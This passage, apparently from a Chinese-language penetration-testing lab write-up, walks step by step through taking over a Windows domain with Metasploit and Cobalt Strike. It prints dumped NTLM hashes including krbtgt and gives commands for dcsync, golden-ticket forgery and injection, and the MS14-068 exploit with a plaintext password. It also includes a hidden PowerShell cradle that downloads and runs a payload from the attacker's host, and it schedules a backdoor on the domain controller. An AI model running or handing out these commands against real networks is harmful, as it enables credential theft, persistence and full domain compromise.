<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:16.6pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">No users with password hints on this system</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">[*] Dumping password hashes...</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">Administrator:500:aad3b435b51404eeaad3b435b51404ee:2cbe963d0d877c8cc7d09c936f 1c3b33:::</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:16.6pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:326.55pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">load mimikatz tspkg</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:39.15pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="143" src="https://www.2k8.org/content/uploadfile/202203/17/577ca08e.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-left:-.25pt;">
        <a name="_Toc21076"></a><span lang="EN-US">5.1.16. </span><span><span style="font-family:宋体;font-weight:normal;">抓域控全部 </span><span lang="EN-US">hash</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">run post/windows/gather/smart_hashdump</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:28.3pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="167" src="https://www.2k8.org/content/uploadfile/202203/17/709c2b03.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:110%;margin-bottom:3.15pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:9.0pt;line-height:110%;">[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:2cbe963d0d877c8cc7d09c936f1c3b33</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:110%;margin-bottom:3.15pt;margin-left:-.75pt;margin-right:0cm;margin-top:0cm;tab-stops:center 208.65pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:9.0pt;line-height:110%;">[+]<span> </span>krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6f60ace6accbcb76078ccc0312174e98</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:110%;margin-bottom:3.15pt;margin-left:-.75pt;margin-right:0cm;margin-top:0cm;tab-stops:center 209.65pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:9.0pt;line-height:110%;">[+]<span> </span>web:1103:aad3b435b51404eeaad3b435b51404ee:086a0bb1ed4ec72250760ea531bf8074</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:110%;margin-bottom:3.15pt;margin-left:-.75pt;margin-right:0cm;margin-top:0cm;tab-stops:center 201.95pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:9.0pt;line-height:110%;">[+]<span> </span>DC$:1000:aad3b435b51404eeaad3b435b51404ee:35038905f0fcf79eca3d8fff28f94f87</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:110%;margin-bottom:88.0pt;margin-left:-.75pt;margin-right:0cm;margin-top:0cm;tab-stops:center 193.2pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:9.0pt;line-height:110%;">[+]<span>&nbsp;&nbsp; </span>WEB$:1104:aad3b435b51404eeaad3b435b51404ee:fd0c8f5bc45e86c9ca5c8a289</span><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:13.1pt;margin-left:0cm;text-indent:0cm;line-height:107%;">
        <a name="_Toc21077"></a><span lang="EN-US" style="font-family:Cambria,serif;font-weight:normal;">5.1.17. </span><span><span style="font-family:宋体;font-weight:normal;">制作黄金票据</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">考虑长期权维护，还是做一个黄金票据比较保险。</span><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:10.75pt;margin-left:-.25pt;">
        <a name="_Toc21078"></a><span lang="EN-US">5.1.18. </span><span><span style="font-family:宋体;font-weight:normal;">获取 </span><span lang="EN-US">ntml sid rid</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:40.05pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:宋体;font-size:10.5pt;line-height:112%;">wmic useraccount where name="krbtgt" get sid</span><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:12.95pt;margin-left:-.25pt;line-height:107%;">
        <a name="_Toc21079"></a><span lang="EN-US" style="font-family:宋体;font-weight:normal;">5.1.19. </span><span><span style="font-family:宋体;font-weight:normal;">窃取 域控超级管理权限</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:4.1pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:9.0pt;line-height:107%;">系统权限没办法做<span lang="EN-US">dcsync </span>所以切换域管理权限</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:141%;margin-bottom:0cm;margin-left:-.25pt;margin-right:295.2pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:宋体;font-size:9.0pt;line-height:141%;">steal_token 2812 dcsync_ntlm krbtgt</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:27.85pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="151" src="https://www.2k8.org/content/uploadfile/202203/17/132be026.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-left:-.25pt;">
        <a name="_Toc21080"></a><span lang="EN-US">5.1.20. </span><span><span style="font-family:宋体;font-weight:normal;">生成黄金票据</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:137%;margin-bottom:16.05pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:9.0pt;line-height:137%;">golden_ticket_create -d &lt;</span><span style="font-family:宋体;font-size:9.0pt;line-height:137%;">域名</span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:9.0pt;line-height:137%;">&gt; -u &lt;</span><span style="font-family:宋体;font-size:9.0pt;line-height:137%;">任意用户名</span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:9.0pt;line-height:137%;">&gt; -s &lt;Domain SID&gt; -k &lt;krbtgt NTLM Hash&gt; -t &lt;ticket </span><span style="font-family:宋体;font-size:9.0pt;line-height:137%;">本地存储路径如</span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:9.0pt;line-height:137%;">:/tmp/krbtgt.ticket&gt;</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:110%;margin-bottom:3.15pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:9.0pt;line-height:110%;">golden_ticket_create -d hackbox.com -u moonsec -s S-1-5-21-2005268815-658469957-1189185684 -k</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:110%;margin-bottom:40.9pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:9.0pt;line-height:110%;">6f60ace6accbcb76078ccc0312174e98 -t /tmp/krbtgt.ticket</span><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:12.95pt;margin-left:-.25pt;line-height:107%;">
        <a name="_Toc21081"></a><span lang="EN-US" style="font-family:宋体;font-weight:normal;">5.1.21. </span><span><span style="font-family:宋体;font-weight:normal;">注入黄金票据</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:4.1pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:9.0pt;line-height:107%;">切换到 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:9.0pt;line-height:107%;">web </span><span style="font-family:宋体;font-size:9.0pt;line-height:107%;">服务器 把凭据都清理掉</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:136%;margin-bottom:3.15pt;margin-left:-.25pt;margin-right:265.85pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:9.0pt;line-height:136%;">kerberos_ticket_use /tmp/test.ticket dir \\dc\c$</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:54.3pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="553" height="350" src="https://www.2k8.org/content/uploadfile/202203/17/4a499e49.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h2 style="margin-top:0cm;margin-right:0cm;margin-bottom:25.05pt;margin-left:-.25pt;">
        <a name="_Toc21082"></a><span lang="EN-US">5.2.cobaltstrike </span><span><span style="font-family:黑体;font-weight:normal;">进行内网域渗透</span></span><span lang="EN-US"></span>
</h2>
<h3 style="margin-left:-.25pt;">
        <a name="_Toc21083"></a><span lang="EN-US">5.2.1.</span><span><span style="font-family:宋体;font-weight:normal;">建立 </span><span lang="EN-US">teamserver</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">./teamserver 192.168.0.127 4477</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">设置好监听器</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:43.85pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="553" height="191" src="https://www.2k8.org/content/uploadfile/202203/17/fb4662ff.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:27.0pt;margin-left:-.25pt;">
        <a name="_Toc21084"></a><span lang="EN-US">5.2.2.</span><span><span style="font-family:宋体;font-weight:normal;">在 </span><span lang="EN-US">web </span></span><span><span style="font-family:宋体;font-weight:normal;">服务器上执行下载 </span><span lang="EN-US">poershell </span></span><span><span style="font-family:宋体;font-weight:normal;">恶意代码</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:7.5pt;line-height:107%;">powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.0.127:80/a'))"</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:23.95pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="553" height="161" src="https://www.2k8.org/content/uploadfile/202203/17/2af40b4e.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-left:-.25pt;">
        <a name="_Toc21085"></a><span lang="EN-US">5.2.3.</span><span><span style="font-family:宋体;font-weight:normal;">设置间隔时间</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">进入 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">beacon</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:40.35pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">设置间隔时间 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">sleep 0 </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">不然会影响后面的操作</span><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:0cm;margin-left:-.25pt;">
        <a name="_Toc21086"></a><span lang="EN-US">5.2.4.</span><span><span style="font-family:宋体;font-weight:normal;">获取 </span><span lang="EN-US">hash </span></span><span><span style="font-family:宋体;font-weight:normal;">获取域内信任主机</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="241" src="https://www.2k8.org/content/uploadfile/202203/17/9b0b9f5c.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:0cm;margin-left:-.25pt;">
        <a name="_Toc21087"></a><span lang="EN-US">5.2.5.</span><span><span style="font-family:宋体;font-weight:normal;">扫描域内主机</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="553" height="350" src="https://www.2k8.org/content/uploadfile/202203/17/eed8f1ce.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"><br clear="all" style="page-break-before:always;" />
</span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:38.45pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="477" src="https://www.2k8.org/content/uploadfile/202203/17/e77f3d66.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:.25pt;margin-left:-.25pt;line-height:256%;">
        <a name="_Toc21088"></a><span lang="EN-US">5.2.6.cs </span><span><span style="font-family:宋体;font-weight:normal;">里面集合了很多 </span><span lang="EN-US">net </span></span><span><span style="font-family:宋体;font-weight:normal;">命令</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:256%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:256%;">可以使用这些命令，方便快捷收集域信息</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:41.4pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="408" src="https://www.2k8.org/content/uploadfile/202203/17/177acee1.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:14.75pt;margin-left:-.25pt;">
        <a name="_Toc21089"></a><span lang="EN-US">5.2.7.cobaltstrike mimikatz web </span><span><span style="font-family:宋体;font-weight:normal;">服务获取明密文</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="555" height="219" src="https://www.2k8.org/content/uploadfile/202203/17/924b0e1b.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:40.55pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="264" src="https://www.2k8.org/content/uploadfile/202203/17/c9c83a08.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:1.75pt;margin-left:-.25pt;">
        <a name="_Toc21090"></a><span lang="EN-US">5.2.8.dir </span><span><span style="font-family:宋体;font-weight:normal;">访问域控 </span><span lang="EN-US">dc</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:75.7pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="129" src="https://www.2k8.org/content/uploadfile/202203/17/0d0cb191.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:16.1pt;margin-left:-.25pt;">
        <a name="_Toc21091"></a><span lang="EN-US">5.2.9.cobaltstrike ms14-068 </span><span><span style="font-family:宋体;font-weight:normal;">提权到域控</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:7.75pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="553" height="153" src="https://www.2k8.org/content/uploadfile/202203/17/b1a26ad3.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">转换的时候出错 估计是文件类型问题</span><span lang="EN-US"></span>
</p>
<h5 style="margin-top:0cm;margin-right:0cm;margin-bottom:18.8pt;margin-left:-.25pt;">
        <span lang="EN-US" style="font-family:Arial,sans-serif;font-size:14.0pt;line-height:110%;">5.2.9.1. </span><span style="font-family:黑体;font-size:14.0pt;font-weight:normal;line-height:110%;">在 </span><span lang="EN-US" style="font-family:Arial,sans-serif;font-size:14.0pt;line-height:110%;">py </span><span style="font-family:黑体;font-size:14.0pt;font-weight:normal;line-height:110%;">脚本下创建票据</span><span lang="EN-US"></span>
</h5>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:6.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">root@kali:~/Desktop/webhack123/pykek# set +H root@kali:~/Desktop/webhack123/pykek# proxychains python ms14-068.py -u [email protected] -s S-1-5-21-2005268815-658469957-1189185684-1103 -d 10.10.10.149 -p !@#Qwe456</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:45.65pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="553" height="129" src="https://www.2k8.org/content/uploadfile/202203/17/026807f6.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h5 style="margin-top:0cm;margin-right:0cm;margin-bottom:18.8pt;margin-left:-.75pt;text-indent:0cm;tab-stops:center 222.05pt;">
        <span lang="EN-US" style="font-family:Arial,sans-serif;font-size:14.0pt;line-height:110%;">5.2.9.2.<span> </span>KrbCredExport </span><span style="font-family:黑体;font-size:14.0pt;font-weight:normal;line-height:110%;">将 </span><span lang="EN-US" style="font-family:Arial,sans-serif;font-size:14.0pt;line-height:110%;">.ccache </span><span style="font-family:黑体;font-size:14.0pt;font-weight:normal;line-height:110%;">文件转化为 </span><span lang="EN-US" style="font-family:Arial,sans-serif;font-size:14.0pt;line-height:110%;">kirbi </span><span style="font-family:黑体;font-size:14.0pt;font-weight:normal;line-height:110%;">格式</span><span lang="EN-US"></span>
</h5>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">python KrbCredExport.py ../pykek/[email protected] user.ticket</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:45.85pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="44" src="https://www.2k8.org/content/uploadfile/202203/17/62887eb4.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h5 style="margin-top:0cm;margin-right:0cm;margin-bottom:17.5pt;margin-left:-.25pt;">
        <span lang="EN-US" style="font-family:Arial,sans-serif;font-size:14.0pt;line-height:110%;">5.2.9.3. </span><span style="font-family:黑体;font-size:14.0pt;font-weight:normal;line-height:110%;">导入票据访问 </span><span lang="EN-US" style="font-family:Arial,sans-serif;font-size:14.0pt;line-height:110%;">dc</span><span lang="EN-US"></span>
</h5>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:1.85pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">导入票据</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">kerberos_ticket_use C:\user.ticket</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:20.75pt;margin-left:1.55pt;margin-right:0cm;margin-top:0cm;">
        <img width="503" height="99" src="https://www.2k8.org/content/uploadfile/202203/17/db01fd7b.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">访问域控 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">dc</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:42.3pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="279" src="https://www.2k8.org/content/uploadfile/202203/17/9f3843f6.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-left:-.25pt;">
        <a name="_Toc21092"></a><span lang="EN-US">5.2.10. </span><span><span style="font-family:宋体;font-weight:normal;">获取 </span><span lang="EN-US">dc </span></span><span><span style="font-family:宋体;font-weight:normal;">域控权限</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:24.85pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">现在只有访问 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">dc </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">域控的权限，接下来是 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">dc </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">域控的控制权限</span><span lang="EN-US"></span>
</p>
<h6 style="margin-top:0cm;margin-right:0cm;margin-bottom:9.75pt;margin-left:-.25pt;">
        <span lang="EN-US">5.2.10.1. </span><span style="font-family:黑体;font-weight:normal;">设置 </span><span lang="EN-US">smb </span><span style="font-family:黑体;font-weight:normal;">连接器</span><span lang="EN-US"></span>
</h6>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:10.35pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="355" src="https://www.2k8.org/content/uploadfile/202203/17/59ceab36.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">生成后门文件 选择 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">smb </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">因为是正向连接 如果使用反向链接 需要做转发 比较麻烦</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:43.75pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="361" src="https://www.2k8.org/content/uploadfile/202203/17/99ebf280.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h6 style="margin-top:0cm;margin-right:0cm;margin-bottom:4.05pt;margin-left:-.25pt;">
        <span lang="EN-US">5.2.10.2. </span><span style="font-family:黑体;font-weight:normal;">复制文件到 </span><span lang="EN-US">dc </span><span style="font-family:黑体;font-weight:normal;">域控并运行</span><span lang="EN-US"></span>
</h6>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:6.0pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="553" height="308" src="https://www.2k8.org/content/uploadfile/202203/17/543d26e5.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:23.65pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">shell at \\dc 15:05:00 c:/aaa.exe</span><span lang="EN-US"></span>
</p>
<h6 style="margin-left:-.25pt;">
        <span lang="EN-US">5.2.10.3. </span><span style="font-family:黑体;font-weight:normal;">在 </span><span lang="EN-US">beacon </span><span style="font-family:黑体;font-weight:normal;">正向连接上 </span><span lang="EN-US">dc</span>
</h6>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">link dc</span><span lang="EN-US"></span>
</p>
